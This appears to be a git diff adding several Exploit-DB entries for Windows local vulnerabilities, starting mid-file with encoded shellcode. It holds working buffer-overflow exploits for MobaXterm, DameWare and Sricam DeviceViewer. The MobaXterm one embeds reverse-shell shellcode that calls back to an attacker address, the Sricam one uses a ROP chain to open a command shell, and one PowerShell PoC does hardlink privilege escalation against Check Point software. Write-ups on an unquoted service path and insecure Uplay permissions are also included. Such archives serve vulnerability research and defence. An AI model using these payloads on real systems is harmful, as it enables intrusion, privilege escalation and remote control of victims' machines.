+zero = "\x25\x01\x01\x01\x01"
+zero += "\x25\x10\x10\x10\x10"
+
+# Stack alignment
+alignment = "\x54"				# push esp
+alignment += "\x58"				# pop eax
+alignment += "\x2d\x1a\x50\x55\x55"		# sub eax, 0x1a505555
+alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
+alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
+alignment += "\x50"				# push eax
+alignment += "\x5c" 				# pop esp
+
+# Custom created and encoded MessageBox POC shellcode.
+# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
+# \x31\xc0\x50\x68
+# \x42\x41\x4a\x41
+# \x89\xe1\x50\x68
+# \x42\x41\x4a\x41
+# \x89\xe2\x50\x50
+# \x51\x52\x50\xbe
+# \x38\x20\x00\x10
+# \xff\xe6\x41\x41
+
+# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
+shellcode = zero				# zero out eax
+shellcode += "\x2d\x55\x15\x4f\x53"		# sub eax, 0x534f1555
+shellcode += "\x2d\x55\x02\x4f\x53"		# sub eax, 0x534f0255
+shellcode += "\x2d\x57\x01\x50\x53"		# sub eax, 0x53500157
+shellcode += "\x50"				# push eax
+
+# 4F554A42 4F554A42 51554B44
+shellcode += zero				# zero out eax
+shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
+shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
+shellcode += "\x2d\x44\x4b\x55\x51"		# sub eax, 0x51554b44
+shellcode += "\x50"				# push eax
+
+# 153A393A 153A393A 173B3B3B
+shellcode += zero
+shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x173b3b3b
+shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x153a393a
+shellcode += "\x2d\x3b\x3b\x3b\x17"		# sub eax, 0x173b3b3b
+shellcode += "\x50"				# push eax
+
+# 3A3A1927 3A3A0227 3B3B0229
+shellcode += zero				# zero out eax
+shellcode += "\x2d\x27\x19\x3a\x3a"		# sub eax, 0x3a3a1927
+shellcode += "\x2d\x27\x02\x3a\x3a"		# sub eax, 0x3a3a0227
+shellcode += "\x2d\x29\x02\x3b\x3b"		# sub eax, 0x3b3b0229
+shellcode += "\x50"				# push eax
+
+# 3F3C3F3F 3F3C3F3F 403D4040
+shellcode += zero				# zero out eax
+shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
+shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
+shellcode += "\x2d\x40\x40\x3d\x40"		# sub eax, 0x403d4040
+shellcode += "\x50"				# push eax
+
+# 323A1A27 323A0227 333B0229
+shellcode += zero				# zero out eax
+shellcode += "\x2d\x27\x1a\x3a\x32"		# sub eax, 0x323a1a27
+shellcode += "\x2d\x27\x02\x3a\x32"		# sub eax, 0x323a0227
+shellcode += "\x2d\x29\x02\x3b\x33"		# sub eax, 0x333b0229
+shellcode += "\x50"				# push eax
+
+# 3F3C3F3F 3F3C3F3F 403D4040
+shellcode += zero                               # zero out eax
+shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
+shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
+shellcode += "\x2d\x40\x40\x3d\x40"             # sub eax, 0x403d4040
+shellcode += "\x50"                             # push eax
+
+# 323A1545 323A1545 333B1545
+shellcode += zero				# zero out eax
+shellcode += "\x2d\x45\x15\x3a\x32"		# sub eax, 0x323a1545
+shellcode += "\x2d\x45\x15\x3A\x32"		# sub eax, 0x323a1545
+shellcode += "\x2d\x45\x15\x3b\x33"		# sub eax, 0x333b1545
+shellcode += "\x50" 				# push eax
+
+# Let's roll.
+payload = "\x41" * 1676
+payload += "\x70\x06\x71\x06"			# JO 6 bytes. If fails, JNO 6 bytes
+payload += struct.pack('<L', 0x10011874)	# pop ebp pop ebx ret reg.dll
+payload += "\x41" * 2				# Padding to reach alignment
+payload += alignment
+payload += shellcode
+payload += "\x45" * (6000-len(payload))
+
+# Write to file
+f = open('bajablast.txt', 'w')
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47429.py b/exploits/windows/local/47429.py
new file mode 100755
index 000000000..7f34eb7f3
--- /dev/null
+++ b/exploits/windows/local/47429.py
@@ -0,0 +1,118 @@
+# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
+# Author: Xavi Beltran
+# Date: 2019-08-31
+# Vendor: xavibel.com
+# Vedor Page: https://mobaxterm.mobatek.net/download.html
+# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
+# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
+
+# Description:
+# SEH based Buffer Overflow in the Username field of a valid session
+# This exploit generates a malicious MobaXterm sessions file
+# When the user double clicks in the session, the shellcode is going to be executed
+# You need to adapt the exploit to your current OS Windows version
+
+#!/usr/bin/env python
+
+# This is not the IP address of the reverse shell
+# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
+
+ip_address = "192.168.1.88"
+port = "22"
+
+# We are going to recreate a MobaXterm sessions file export
+print ("[+] Creating the malicious MobaXterm file...")
+sessions_file  = ""
+sessions_file += "[Bookmarks]\n"
+sessions_file += "SubRep=\n"
+sessions_file += "ImgNum=42\n"
+sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
+
+# Here is the SEH Based Buffer Overflow part
+
+# [*] Exact match at offset 16672
+# We have to substract 4 that corresponds to NSEH
+junk1 = "A" * 16668
+
+# Here we need to jump forward but EB is a bad char
+# We decrease ESP and use a conditional jump after
+# I have learned this trick in OSCE. Thank you Muts 
+nseh = ""
+nseh += "\x4C"     # DEC ESP
+nseh += "\x4C"     # DEC ESP
+nseh += "\x77\x21" # JA SHORT 1035FE59
+
+# Using a XP-SP1 so modules are compiled without SafeSEH
+# !mona seh -cp asciiprint
+# 0x762C5042 POP-POP-RET crypt32.dll
+seh  = "\x42\x50\x2C\x76"
+
+# Some padding that we are going to jump over it
+junk2 = "\x42" * 29
+
+# We recover the initial state of the stack
+alignment = ""
+alignment += "\x44" # INC ESP
+alignment += "\x44" # INC ESP
+
+
+# And we reach our shellcode
+# A0 is a badchar but the generated encoded shellcode won't use it
+# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
+# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
+# Shellcode 636 bytes
+shellcode = ""
+shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
+shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
+shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
+shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
+shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
+shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
+shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
+shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
+shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
+shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
+shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
+shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
+shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
+shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
+shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
+shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
+shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
+shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
+shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
+shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
+shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
+shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
+shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
+shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
+shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
+shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
+shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
+shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
+shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
+shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
+shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
+shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
+shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
+shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
+shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
+shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
+shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
+shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
+shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"
+
+crash = junk1 + nseh + seh + junk2 + alignment + shellcode
+
+# We need to mantain the MobaXterm sessions file structure
+sessions_file += crash
+sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"
+
+# We generate the file
+f = open( 'pwnd.mxtsessions', 'w' )
+f.write(sessions_file)
+f.close()
+
+print ("[+] pwnd.mxtsessions file created!")
+print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
\ No newline at end of file
diff --git a/exploits/windows/local/47444.py b/exploits/windows/local/47444.py
new file mode 100755
index 000000000..2513aa780
--- /dev/null
+++ b/exploits/windows/local/47444.py
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+# Author: Xavi Beltran
+# Contact: xavibeltran@protonmail.com
+# Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/
+# Date: 14/7/2019
+
+# Description:
+#           SEH based Buffer Overflow
+#			DameWare Remote Support V. 12.1.0.34
+#           Tools >> Computer Comments >> Description
+
+# msf-pattern_offset -q "37694136" -l 5000
+# [*] Exact match at offset 260
+junk1 = "\x41" * 260
+
+# Unicode compatible padding
+nseh  = "\x61\x43"
+
+# 0x007a0021 : pop esi # pop edi # ret
+# startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [DNTU.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v12.1.0.34 (C:\Program Files\SolarWinds\DameWare Remote Support\DNTU.exe)
+seh   = "\x21\x7a"
+
+# Put shellcode memory address in EAX, push it to the stack and RETN
+# 20 bytes
+align  = ""
+align += "\x43" * 10                # Padding
+align += "\x58"                     # POP EAX
+align += "\x73"                     # Venetian padding
+# 0012F590   83C0 50          ADD EAX,50
+align += u"\uC083" + "\x50"         # ADD EAX, 50
+align += "\x73"                     # Venetian padding
+align += "\x50"                     # PUSH EAX
+align += "\x73"                     # Venetian padding
+align +=  u'\uC3C3'                 # RETN
+
+# 1348
+junk2 = "\x43" * 18
+
+# 7FFDD066 + 2 memory address contains the value FFFF0000
+# This value is going to be placed in EBX 
+# And it doesn't break the execution flow
+junk3 = "\x44" * 550 + u"\uD066" + u"\u7FFD" # u"\xF0FF"
+
+# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
+# ./alpha2 eax --unicode --uppercase < shellcode.raw
+# 508 bytes
+shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"
+
+crash = junk1 + nseh + seh + align + junk2 + shellcode + junk3
+
+print(crash)
\ No newline at end of file
diff --git a/exploits/windows/local/47454.md b/exploits/windows/local/47454.md
new file mode 100644
index 000000000..830429449
--- /dev/null
+++ b/exploits/windows/local/47454.md
@@ -0,0 +1,25 @@
+# CVE-2019-15943
+
+Counter-Strike Global Offensive (vphysics.dll) before 1.37.1.1 allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map using memory corruption. 
+
+### Description:
+
+We are need modifying class name value in our PoC for triggering this vulnerability, offset for modifying in our PoC is `0x115703`. For example add char `"="` using this offset. PoC is "mc.bsp"
+
+![](https://github.com/bi7s/CVE/blob/master/CVE-2019-15943/img/offset.png)
+
+For modeling situation for attack we are need next:
+First step is copy mc.bsp to `C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo\maps`;
+
+Second step is start game with our map (mc.bsp), for this we are need turn on game console and insert in console: `map mc`.
+
+![](https://github.com/bi7s/CVE/blob/master/CVE-2019-15943/img/1.png)
+
+After this steps we can see next:
+
+![](https://github.com/bi7s/CVE/blob/master/CVE-2019-15943/img/windbg.png)
+
+I was use msec.dll (!exploitable) is a Windows debugging extension (Windbg) that provides automated crash analysis and security risk assessment [Download msec.dll](https://archive.codeplex.com/?p=msecdbg)
+As you can see msec.dll checked this crash and decide that is EXPLOITABLE crash, because SEH chain is corrupted. It is means that attacker can use this vulnerability for remote code execution.
+
+EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47454.bsp
\ No newline at end of file
diff --git a/exploits/windows/local/47471.txt b/exploits/windows/local/47471.txt
new file mode 100644
index 000000000..e88715672
--- /dev/null
+++ b/exploits/windows/local/47471.txt
@@ -0,0 +1,71 @@
+# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
+# Date: 2019-01-30
+# Exploit Author: Jakub Palaczynski
+# Vendor Homepage: https://www.checkpoint.com/
+# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
+# Version: Check Point ZoneAlarm <= 15.4.062.17802
+# CVE: CVE-2019-8452
+
+
+Description:
+============
+
+It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation.
+
+It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
+Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges.
+However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted).
+However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it.
+
+Taking all of this into account we can create an attack scenario:
+1. If tvDebug.zip file exists then delete it
+2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
+3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
+4. Restart system as service needs to be restarted to make an archive.
+5. Now your file has permissions changed and you have all access to it.
+6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
+7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.
+
+
+Proof of Concept:
+=================
+
+# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.
+
+# file that we want to have permissions to
+# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
+$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"
+
+# path to symboliclink testing tools CreateHardlink.exe
+# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
+$hardlink = "C:\Temp\CreateHardlink.exe"
+
+Write-Host "[!] Detecting Check Point software."
+if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
+	$logfile = "$env:windir\Internet Logs\tvDebug.zip"
+	Write-Host "[+] Check Point Endpoint Security found."
+}
+elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
+	$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
+	Write-Host "[+] Check Point ZoneAlarm found."
+}
+else {
+	Write-Host "[-] Check Point software was not found."
+}
+
+Write-Host "[!] Trying to delete tvDebug.zip file."
+if ([System.IO.File]::Exists($logfile)) {
+    while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue }
+    Write-Host "[+] Successfully deleted tvDebug.zip archive file."
+}
+else {
+    Write-Host "[+] tvDebug.zip archive file was not found."
+}
+
+Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
+Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
+while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
+Write-Host "[+] Hardlink successfully created."
+Write-Host "[!] 1. Fill log file up to the limit and restart computer."
+Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
+Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."
\ No newline at end of file
diff --git a/exploits/windows/local/47477.py b/exploits/windows/local/47477.py
new file mode 100755
index 000000000..94226be96
--- /dev/null
+++ b/exploits/windows/local/47477.py
@@ -0,0 +1,123 @@
+# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
+# Date: 08/10/2019
+# Exploit Author: Alessandro Magnosi
+# Vendor Homepage: http://www.sricam.com/
+# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
+# Version: v3.12.0.1
+# Exploit type: Local
+# Tested on: Windows 7 SP1
+
+# Steps to reproduce:
+#   1. Get the WinExec address from arwin.exe kernel32.dll WinExec
+#   2. Change the related address in the PoC
+#   3. Generate the payload using the PoC
+#   4. Log in the Sricam DeviceViewer application
+#   5. Go to System Configuration -> User Management
+#   6. Put the content of the generated file in User Info -> Username  
+#   7. Click on Add
+#   8. A command shell will appear
+
+#!/usr/bin/python
+
+from struct import pack, unpack
+
+def create_rop_chain():
+
+    rops = [
+    
+    0x6a1142aa,  # XOR EDX,EDX # RETN
+    
+    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
+    0x6ae9c126,  # &Writable location [avutil-50.dll] 
+    
+    0x6a5dac8a,  # POP EAX # RETN
+    0xff9b929d,  # NEG "cmd\0"
+
+    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
+    
+    0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+        
+    0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
+    0x6a2420ea,  # ROP NOP            ---> EDI     
+        
+    0x6a45e446,  # XCHG EAX,EDX # RETN  [avcodec-54.dll] 
+    0x6a29d716,  # XCHG EAX,ECX # RETN  [avcodec-54.dll] 
+    
+    ##  ECX = ascii "cmd\0"
+    
+    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
+    0x6a36264a,  # CALL EBX
+   
+    ## EDX = CALL EBX
+   
+    0x6a5dac8a,  # POP EAX # RETN
+    0x76e33231,  # ptr to WinExec() [kernel32.dll]  
+    #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication  
+    
+    0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll]
+    
+    ## EBX = &WinExec
+    
+    0x6a5dac8a,  # POP EAX # RETN
+    0xffffffff,  # -0x00000001-> ebx
+    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
+    
+    ## EAX = 1
+        
+    0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
+    0x6a2420ea,  # ROP NOP    
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    0x6a2420ea,  # ROP NOP
+    ]
+    return ''.join(pack('<I', _) for _ in rops)
+
+
+def nops(length):
+    return "\x90" * length
+
+rop_chain = create_rop_chain()
+maxlen = 5000
+
+# Stack pivoting address
+# 0x6a443e58 : {pivot 2252 / 0x8cc} :  # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
+seh = pack("<I", 0x6a443e58)
+
+# Don't care nseh
+nseh = nops(4)
+
+payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
+sec = maxlen - len(payload)
+payload += nops(sec) # More junk to reach 5000
+
+print("Exploit Length: " + str(len(payload)))
+
+try:
+    fname = "exprop.txt"
+    exploit = open(fname,"w")
+    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
+    print("Author: Alessandro Magnosi\n")
+    print("[*] Creating evil username")
+    exploit.write(payload)
+    exploit.close()
+    print("[+] Username file created\n")
+    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
+    print("[+] A command shell will open")
+except:
+    print("[!] Error creating the file")
\ No newline at end of file
diff --git a/exploits/windows/local/47490.txt b/exploits/windows/local/47490.txt
new file mode 100644
index 000000000..e13cf4742
--- /dev/null
+++ b/exploits/windows/local/47490.txt
@@ -0,0 +1,58 @@
+# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
+# Discovery Date: 2019-10-10
+# Exploit Author: Ivan Marmolejo
+# Vendor Homepage: http://www.ni.com/en-us.html
+# Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
+# Version: 14.0
+# Vulnerability Type: Local
+# Tested on: Windows 10 Pro x64 Esp
+# Version: 10.0.18362
+
+# Exploit.txt
+
+##############################################################################################################################################
+
+Summary:        Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation, 
+validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive 
+SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers
+advanced simulation capabilities to give you a clear view of how circuits perform in any situation.
+
+Description:    The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an 
+authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
+the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
+potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+
+##############################################################################################################################################
+
+Step to discover the unquoted Service:
+
+ 
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+
+NI Service Locator           NiSvcLoc              C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s            Auto
+
+
+##############################################################################################################################################
+
+Service info:
+
+
+C:\Users\user>sc qc NiSvcLoc
+
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: NiSvcLoc
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : NI Service Locator
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+##############################################################################################################################################
\ No newline at end of file
diff --git a/exploits/windows/local/47493.txt b/exploits/windows/local/47493.txt
new file mode 100644
index 000000000..c387c0211
--- /dev/null
+++ b/exploits/windows/local/47493.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
+# Date: 2019-08-07
+# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
+# Vendor Homepage: https://uplay.ubisoft.com/
+# Version: 92.0.0.6280
+# Tested on: Windows 10 x64
+# CVE : N/A
+
+# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission 
+# that allows all BUILTIN-USER has full permission. An attacker replace the 
+# vulnerability execute file with malicious file.
+
+///////////////////////
+   Proof of Concept
+///////////////////////
+
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
+                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
+                                                     NT SERVICE\TrustedInstaller:(I)(F)
+                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                                                     NT AUTHORITY\SYSTEM:(I)(F)
+                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                                                     BUILTIN\Administrators:(I)(F)
+                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                                                     BUILTIN\Users:(I)(RX)
+                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+07 Aug, 19 : Found Vulnerability
+07 Aug, 19 : Vendor Notification
